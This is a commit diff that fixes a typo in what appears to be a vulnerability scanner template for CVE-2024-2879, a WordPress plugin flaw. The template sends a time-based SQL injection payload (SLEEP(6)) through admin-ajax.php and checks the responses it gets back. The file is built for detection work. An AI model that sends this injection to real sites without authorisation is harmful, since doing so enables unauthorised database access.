Fix typo in CVE-2024-2879.yaml
parent
34684c26a1
commit
37b761ab59
|
@ -45,7 +45,7 @@ http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
@timeout: 10s
|
@timeout: 10s
|
||||||
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+x) HTTP/1.1'
|
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+x) HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -55,4 +55,4 @@ http:
|
||||||
- status_code == 200
|
- status_code == 200
|
||||||
- contains(body, "<script>")
|
- contains(body, "<script>")
|
||||||
condition: and
|
condition: and
|
||||||
# digest: 4b0a0048304602210093a5b04866b078b807cfbd803744ae129e205970fc34c73f9973d5bfabdd2355022100ddc08432b37d7c1696f3d5b2e311091d4815737e67056280e524abc9c49b4f3d:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a0048304602210093a5b04866b078b807cfbd803744ae129e205970fc34c73f9973d5bfabdd2355022100ddc08432b37d7c1696f3d5b2e311091d4815737e67056280e524abc9c49b4f3d:922c64590222798bb761d5b6d8e72950
|
||||||
|
|
Loading…
Reference in New Issue